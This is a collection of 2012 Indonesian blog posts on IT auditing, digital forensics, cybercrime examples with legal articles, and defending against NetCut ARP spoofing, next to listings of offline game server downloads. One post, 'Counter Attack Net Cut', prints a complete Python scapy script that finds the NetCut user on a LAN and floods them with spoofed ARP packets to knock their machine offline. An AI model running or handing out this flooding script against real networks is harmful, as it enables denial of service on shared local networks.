Please Enable JavaScript Your Browser.. Thank's

Perfect World International New Horizons

Perfect World International New Horizons Version Offline dengan Server 1.5.1, terdapat 5 RAS dengan Quest terbaru, makin penasaran Silahkan Download atau Membeli pada Blog ini.. Sekian dan Terima Kasih..

Perfect World International Siren War

Perfect World Siren War Version Offline dengan Server 1.4.6, terdapat 5 RAS dengan Quest terbaru, makin penasaran Silahkan Download atau Membeli pada Blog ini.. Sekian dan Terima Kasih..

BattleField 2142 Offline

Battle 2142 Offline Full Installer, dapat bermain LAN dengan teman-teman Anda beserta BOTS (Maps yang ada BOTSnya saja)

Dragon Nest Trial Offline

Dragon Nest Offline Ini belum ada yang full Version masih Trial Version..

Perfect World International Rising Tide

Perfect World International Rising Tide Version Offline dengan Server 1.3.6, dengan 3 RAS, sudah banyak perbaikan baik game maupun Web Localhostnya, penasaran silahkan Download.. Sekian dan Terima Kasih..

Senin, 30 April 2012

Auditor dan Forensik Teknologi Informasi

Secara umum Audit IT adalah suatu proses kontrol pengujian terhadap infrastruktur teknologi informasi dimana berhubungan dengan masalah audit finansial dan audit internal. Audit IT lebih dikenal dengan istilah EDP Auditing (Electronic Data Processing), biasanya digunakan untuk menguraikan dua jenis aktifitas yang berkaitan dengan komputer. Salah satu penggunaan istilah tersebut adalah untuk menjelaskan proses penelahan dan evaluasi pengendalian-pengendalian internal dalam EDP. Jenis aktivitas ini disebut sebagai auditing melalui komputer. Penggunaan istilah lainnya adalah untuk menjelaskan pemanfaatan komputer oleh auditor untuk melaksanakan beberapa pekerjaan audit yang tidak dapat dilakukan secara manual. Jenis aktivitas ini disebut audit dengan komputer.

Audit IT sendiri merupakan gabungan dari berbagai macam ilmu, antara lain Traditional Audit, Manajemen Sistem Informasi, Sistem Informasi Akuntansi, Ilmu Komputer, dan Behavioral Science.

Audit IT bertujuan untuk meninjau dan mengevaluasi faktor-faktor ketersediaan (availability), kerahasiaan (confidentiality), dan keutuhan (integrity) dari sistem informasi organisasi.

Dari segi teknis spesifikasi dapat dilihat dari:

1. Sistem dan aplikasi.
Audit yang berfungsi untuk memeriksa apakah sistem dan aplikasi sesuai dengan kebutuhan organisasi, berdayaguna, dan memiliki kontrol yang cukup baik untuk menjamin keabsahan, kehandalan, tepat waktu, dan keamanan pada input, proses, output pada semua tingkat kegiatan sistem.
2. Fasilitas pemrosesan informasi.
Audit yang berfungsi untuk memeriksa apakah fasilitas pemrosesan terkendali untuk menjamin ketepatan waktu, ketelitian, dan pemrosesan aplikasi yang efisien dalam keadaan normal dan buruk.
3. Pengembangan sistem.
Audit yang berfungsi untuk memeriksa apakah sistem yang dikembangkan mencakup kebutuhan obyektif organisasi.
4. Arsitektur perusahaan dan manajemen TI.
Audit yang berfungsi untuk memeriksa apakah manajemen TI dapat mengembangkan struktur organisasi dan prosedur yang menjamin kontrol dan lingkungan yang berdaya guna untuk pemrosesan informasi.
5. Client/Server, telekomunikasi, intranet, dan ekstranet.
Suatu audit yang berfungsi untuk memeriksa apakah kontrol-kontrol berfungsi pada client, server, dan jaringan yang menghubungkan client dan server.

Pada tingkat kemampuan Audit IT harus memiliki diantaranya:
1. Tahapan Perencanaan.
Sebagai suatu pendahuluan mutlak perlu dilakukan agar auditor mengenal benar obyek yang akan diperiksa sehingga menghasilkan suatu program audit yang didesain sedemikian rupa agar pelaksanaannya akan berjalan efektif dan efisien.
2. Mengidentifikasikan resiko dan kendali.
Untuk memastikan bahwa qualified resource sudah dimiliki, dalam hal ini aspek SDM yang berpengalaman dan juga referensi praktik-praktik terbaik.
3. Mengevaluasi kendali dan mengumpulkan bukti-bukti.
Melalui berbagai teknik termasuk survei, interview, observasi, dan review dokumentasi.
4. Mendokumentasikan.
Mengumpulkan temuan-temuan dan mengidentifikasikan dengan auditee.
5. Menyusun laporan.
Mencakup tujuan pemeriksaan, sifat, dan kedalaman pemeriksaan yang dilakukan.

Sumber: http://www.scribd.com/doc/13263189/Audit-Sistem-Informasi

Mengenai suatu forensik dalam IT yaitu diantaranya mempunyai sebuah definisi serta tujuan dan Terminlogi forensik itu sendiri:


* Definisi sederhana, yaitu penggunaan sekumpulan prosedur untuk melakukan pengujian secara menyeluruh suatu sistem komputer dengan mempergunakan software dan tool untuk memelihara barang bukti tindakan kriminal.

Tujuan dari IT yaitu mengamankan dan menganalisa bukti digital. Dari data yang diperoleh melalui survey oleh FBI dan The Computer Security Institute, pada tahun 1999 mengatakan bahwa 51% responden mengakui bahwa mereka telah menderita kerugian terutama dalam bidang finansial akibat kejahatan komputer. Kejahatan Komputer dibagi menjadi dua, yaitu :
1. Komputer fraud.
Kejahatan atau pelanggaran dari segi sistem organisasi komputer.
2. Komputer crime.
Merupakan kegiatan berbahaya dimana menggunakan media komputer dalam melakukan pelanggaran hukum.

* Terminologi IT Forensik diantaranya:
A. Bukti digital (digital evidence).
adalah informasi yang didapat dalam bentuk atau format digital, contohnya e-mail.

B. Empat elemen kunci forensik dalam teknologi informasi, antara lain :

1. Identifikasi dari bukti digital.
Merupakan tahapan paling awal forensik dalam teknologi informasi. Pada tahapan ini dilakukan identifikasi dimana bukti itu berada, dimana bukti itu disimpan dan bagaimana penyimpanannya untuk mempermudah tahapan selanjutnya.

2. Penyimpanan bukti digital.
Termasuk tahapan yang paling kritis dalam forensik. Bukti digital dapat saja hilang karena penyimpanannya yang kurang baik.
3. Analisa bukti digital.

Pengambilan, pemrosesan, dan interpretasi dari bukti digital merupakan bagian penting dalam analisa bukti digital.

4. Presentasi bukti digital.
Proses persidangan dimana bukti digital akan diuji dengan kasus yang ada. Presentasi disini berupa penunjukkan bukti digital yang berhubungan dengan kasus yang disidangkan.

Investigasi kasus teknologi informasi.
1. Prosedur forensik yang umum digunakan, antara lain :

a. Membuat copies dari keseluruhan log data, file, dan lain-lain yang dianggap perlu pada suatu media yang terpisah.

b. Membuat copies secara matematis.

c. Dokumentasi yang baik dari segala sesuatu yang dikerjakan.

2. Bukti yang digunakan dalam IT Forensics berupa :
a. Harddisk.
b. Floopy disk atau media lain yang bersifat removeable.
c. Network system.

3. Beberapa metode yang umum digunakan untuk forensik pada komputer ada dua yaitu :

a. Search dan seizure.
Dimulai dari perumusan suatu rencana.

b. Pencarian informasi (discovery information).
Metode pencarian informasi yang dilakukan oleh investigator merupakn pencarian bukti tambahan dengan mengandalkan saksi baik secara langsung maupun tidak langsung terlibat dengan kasus ini

Kamis, 26 April 2012

Anti Netcut Version Windows XP, Vista & 7

Untuk Windows XP:
* Masuk ke Command Prompt (cmd) lalu ketik:

arp -s 192.168.6.1 00-00-cd-0c-7b-ae

Untuk Windows 7:
* Ketik cmd klik kanan run as administrator, ketikin:

netsh interface ipv4 add neighbors "Wireless Network Connection" 192.168.6.1 00-00-cd-0c-7b-ae

*Note: "Wireless Network Connection" liat name Network Wirelessnya di Network adapter

Catetan tambahan:

 Ip: 192.168.6.1 adalah IP gateway yang saya gunakan

Mac Gateway: 00-00-cd-0c-7b-ae adalah alamat sebuah gateway untuk koneksi internet

Sudah dibahas sebelumnya tentang pembahasan Net Cut.

Install WICD di Ubuntu (Trouble Connection)

Masalah yang sederhana dan sudah saya tes di Ubuntu yang gunain WICD biasanya waktu koneksi ke wifi mental alias tidak ada response dari Router wifinya, ikutin cara dibawah ini semoga aja berhasil, karena harusnya berhasil saya sudah mencobanya:
1. Buka terminal lalu:
dpkg-reconfigure wicd
update-rc.d wicd defaults
2. Restart Laptop/PC.

Kamis, 12 April 2012

Counter Attack Net Cut

Disini saya menggunakan Backtrack 5 yang sudah kumplit aplikasi untuk yang aneh-aneh... mungkin pengunjung sudah tidak aneh lagi mendengar Operating Sistem ini yang termasuk distro Ubuntu 10.04 version Gnome, Nah sekarang saya membahas sedikit tentang Konsep Net Cut dan cara menangkal ataupun membalas agar Komputer si Net Cut Over memory di RAMnya:

1. Net Cut:

Net cut menurut konsep pemahaman saya dari banyak literatur video, searching maupun buku, mengatakan bahwa Net Cut menggunakan konsep ARP-Poisoning, dimana Mac Gateway si Komputer Korban agar berbeda dengan gateway defaultnya.

Misal:

Gateway Internet Asli:

192.168.6.1 dengan Mac: 00:00:cd:0c:7b:ae

Kompi Korban awalnya:

192.168.6.20 dengan Mac 00:26:82:22:ae:oc dan Mac Gateway: 00:00:cd:0c:7b:ae

Kompi Penjahat mencoba racuni Kompi Korban:

Penjahat: 192.168.6.21 dengan Mac 48:af:28:11:ae:cd dan Mac Gateway 00:00:cd:0c:7b:ae

Kompi Korban saat terinfeksi oleh Kompi si Penjahat:

192.168.6.20 dengan Mac 00:26:82:22:ae:oc dan Mac Gateway milik penjahat ataupun random: 48:af:28:11:ae:cd ---> berbeda dengan Gateway Defaultnya yang: 00:00:cd:0c:7b:ae

2. Arpon

Untuk aplikasi yang satu ini biasanya (saya) gunakan di Backtrack 5 ataupun distro linux ubuntu pada umumnya dengan cara menginstall lewat terminal dengan server lokal ataupun luar:

Catetan kalo selain Backtrack gunakan perintah sudo untuk mengeksekusi sebagai root.

apt-get install arpon

Setelah terinstal kita setting lagi sedikit agar dapat berjalan:

1. gedit /etc/arpon.sarpi

Tambahkan IP dan Mac Gateway (Sebelum terinfeksi) tanpa tanda pagar karena tanda # untuk komentar

Misal:
#IP_Gateway
192.168.6.1 00:00:cd:0c:7b:ae

Lalu save

2. gedit /etc/default/arpon

Lihat script dibawah:

# For SARPI uncomment the following line
#DAEMON_OPTS="-d -f /var/log/arpon/arpon.log -g -s"

# For DARPI uncomment the following line
#DAEMON_OPTS="-d -f /var/log/arpon/arpon.log -g -y"

# Modify to RUN="yes" when you are ready
RUN="no"

Rubah jika Mode Static Hilangkan tanda # Daemon untuk SARPI jika tipe Dynamic hilangkan tanda # Daemon untuk DARPI.

Menjalankan arpon:

Lihat dahulu mode apa yang digunakan (Interface)
1. Eth = LAN
2. Wlan = Wireless

Contoh saya menggunakan interface Wlan0:

arpon -i wlan0 -y

(catetan: saya terkoneksi dengan tipe dynamic Mode DARPI jadi menggunakan perintah akhir -y apabila menggunakan SARPI tinggal rubah perintah akhir dengan -s)

3. Anti Net-Cut 2.0:
#!/usr/bin/env python
#Exploit Title: Netcut Denial of Service Vulnerability
#Version: Netcut 2
#Tested on: Windows Xp, Windows 7

from scapy.all import sniff, Ether, ARP, RandIP, RandMAC, Padding, sendp, conf
import commands, os, sys

#gw_mac = commands.getoutput("arp -i %s | grep %s" % (conf.iface,conf.iface)).split()[2]
gw_ip = commands.getoutput("ip route list | grep default").split()[2]
    
def protect(gw_ip, gw_mac):
    os.popen("arp -s %s %s" % (gw_ip, gw_mac))
    print "Protected From Terrorist"
    
def detect():
        ans = sniff(filter='arp', timeout=7)
        target = []
        for r in ans.res:
            target.append(r.sprintf("%ARP.pdst% %ARP.hwsrc% %ARP.psrc%"))
        return target

def preattack(gw_ip):
    flag = 0
    num = []
    count = 0
    target = 0
    temp = 0
    print "Searching Terrorist..."
    d = detect()
    for i in range(len(d)):
        if d[i].split()[0] == "255.255.255.255":
            num.append(d.count(d[i]))
            if d.count(d[i]) > count:
                count = d.count(d[i])
                target = i
        if d[i].split()[0] == gw_ip:
            temp += 1
    if len(d) < 7:
        print "[-] No One Terrorist..."
        exit()
    if len(num) * 7 < temp:
        num[:] = []
        count = 0
        result = float(temp) / len(d) * 100
        for j in range(len(d)):
            if d[j].split()[0] == gw_ip:
                if d.count(d[j]) > count:
                    count = d.count(d[j])
                    target = j
            result = float(temp) / len(d) * 100
        flag = 1
    else:
        num.reverse()
        result = float(num[0] + temp) / len(d) * 100
    print "There is a possibility that " + str(result) + "%"
    if result >= 50:
        target_mac = d[target].split()[1]
        target_ip = d[target].split()[2]
        print "[+] Detected Terrorist Location Protocol Cyber %s MAC %s" % (target_ip, target_mac)
        if flag == 0:
            attack(target_mac, target_ip, gw_ip)
        else:
            print "[-] Can't Attack"
    else:
        print "[-] No one Terrorist or try again"

def attack(target_mac, target_ip, gw_ip):
    print "[+] Counter Attack of Fire in The Hole !!!"
    e = Ether(dst="FF:FF:FF:FF:FF:FF")
    while 1:
        a = ARP(psrc=RandIP(), pdst=RandIP(), hwsrc=RandMAC(), hwdst=RandMAC(), op=1)
        p = e / a / Padding("\x00"*18)
        sendp(p, verbose=0)
        a1 = ARP(psrc=gw_ip, pdst=target_ip, hwsrc=RandMAC(), hwdst=target_mac, op=2)
        p1 = e / a1 / Padding("\x00"*18)
        sendp(p1, verbose=0)
        
if __name__ == '__main__':
    os.system("clear")  
    if len(sys.argv) == 2 or len(sys.argv) == 3:
        if len(sys.argv) == 2:
            conf.iface = sys.argv[1]
            preattack(gw_ip)
        if len(sys.argv) == 3:
            conf.iface = sys.argv[1]
            gw_mac = sys.argv[2]
            protect(gw_ip, gw_mac)
            preattack(gw_ip)
    else:
        print '''Mode:
1.)Attack only Terroris
Usage: NetcutKiller
Example: NetcutKiller.py wlan0
2.)Attack with protect himself From Terroris
Usage: NetcutKiller
Example: NetcutKiller.py wlan0 00:FA:77:AA:BC:AF
''' 

Simpan misal Pembalasan_Netcut.py simpan di root (home)

(Catetan: bahasa yang digunakan menggunakan bahasa pemograman python jadi ekstensi akhir berikan .py)

Lalu untuk menjalankannya Lewat terminal:

python Pembalasan_Netcut.py

Lalu akan muncul pilihan.

Have Fun ^^.. mohon maaf apablia ada yang kurang dalam tutorial ini.

Rabu, 11 April 2012

Contoh Pelanggaran Teknologi Informasi

1. Data Forgery

Kejahatan jenis ini dilakukan dengan tujuan memalsukan data pada dokumen-dokumen penting yang ada di internet. Dokumen-dokumen ini biasanya dimiliki oleh institusi atau lembaga yang memiliki situs berbasis web database.

Contoh Kasus :

Data Forgery Pada E-Banking BCA

Dunia perbankan melalui Internet (e-banking) Indonesia, dikejutkan oleh ulah seseorang bernama Steven Haryanto, seorang hacker dan jurnalis pada majalah Master Web. Lelaki asal Bandung ini dengan sengaja membuat situs asli tapi palsu layanan Internet banking Bank Central Asia, (BCA). Steven membeli domain-domain dengan nama mirip www.klikbca.com (situs asli Internet banking BCA), yaitu domain www.klik-bca.com,www.kilkbca.com, www.clikbca.com, www.klickca.com. Dan www.klikbac.com. Isi situs-situs plesetan inipun nyaris sama, kecuali tidak adanya security untuk bertransaksi dan adanya formulir akses (login form) palsu. Jika nasabah BCA salah mengetik situs BCA asli maka nasabah tersebut masuk perangkap situs plesetan yang dibuat oleh Steven sehingga identitas pengguna (user id) dan nomor identitas personal (PIN) dapat di ketahuinya.

Undang-Undang :

Pasal 23 (2): Pemilikan dan penggunaan nama domain sebagaimana dimaksud dalam ayat (1) wajib didasarkan pada itikad baik, tidak melanggar prinsip persaingan usaha secara sehat, dan tidak melanggar hak orang lain. (Tindak pidana sebagaimana dimaksud dalam ayat (1) hanya dapat dituntut atas pengaduan dari orang yang terkena tindak pidana) ( Pidana enam bulan atau denda Rp 100 juta)

Pasal 27 (2): Setiap orang dilarang menggunakan dan atau mengakses komputer dan atau sistem elektronik dengan cara apapun tanpa hak, untuk memperoleh, mengubah, merusak, atau menghilangkan informasi milik pemerintah yang karena statusnya harus dirahasiakan atau dilindungi.( Pidana 20 tahun dan denda Rp 10 miliar).

2. Cyber Espionage, Sabotage, and Extortion

Cyber Espionage merupakan kejahatan yang memanfaatkan jaringan internet untuk melakukan kegiatan mata-mata terhadap pihak lain, dengan memasuki sistem jaringan komputer pihak sasaran. Sabotage and Extortion merupakan jenis kejahatan yang dilakukan dengan membuat gangguan, perusakan atau penghancuran terhadap suatu data, program komputer atau sistem jaringan komputer yang terhubung dengan internet.

Contoh Kasus :

munculnya “sendmail worm” (sekitar tahun 1988) yang menghentikan sistem email Internet kala itu. Kemudian dibentuk sebuah Computer Emergency Response Team (CERT). Semenjak itu di negara lain mulai juga dibentuk CERT untuk menjadi point of contact bagi orang untuk melaporkan masalah kemanan. IDCERT merupakan CERT Indonesia.

Undang-undang :

Pasal 27 (1): Setiap orang dilarang menggunakan dan atau mengakses komputer dan atau sistem elektronik dengan cara apapun tanpa hak, untuk memperoleh, mengubah, merusak, atau menghilangkan informasi dalam komputer dan atau sistem elektronik. (Pidana empat tahun penjara dan denda Rp 1 miliar).

3. Cyberstalking

Kejahatan jenis ini dilakukan untuk mengganggu atau melecehkan seseorang dengan memanfaatkan komputer, misalnya menggunakan e-mail dan dilakukan berulang-ulang. Kejahatan tersebut menyerupai teror yang ditujukan kepada seseorang dengan memanfaatkan media internet. Hal itu bisa terjadi karena kemudahan dalam membuat email dengan alamat tertentu tanpa harus menyertakan identitas diri yang sebenarnya.

Contoh Kasus :

Misalnya e-mail yang berisi ajakan bergabung dengan suatu website,

email yang berisi ajakan untuk membeli produk tertentu,

mail yang berisi kontes / undian berhadiah, misalnya dengan subject

“YOU HAVE WON $1,000,000″ , “LOTTERY NATIONAL UK” , “FREE LOTTO INTERNATIONAL” , “YOU WON YAHOO LOTTO PROMOTION $1,000″,

“EASY MONEY” ,”WIN CASH ONLINE” ,”FREE JACKPOT” , dan sekarang makin gencar menawarkan produk

paket Adobe Suite yang dilengkapi dengan attachment pdf.

Undang-undang :

Pasal 25: Penggunaan setiap informasi melalui media elektronik yang menyangkut data tentang hak pribadi seseorang harus dilakukan atas persetujuan dari orang yang bersangkutan, kecuali ditentukan lain oleh peraturan perundang-undangan.

Sumber: http://niaas8.wordpress.com/2012/04/05/maraknya-kejahatan-didunia-maya/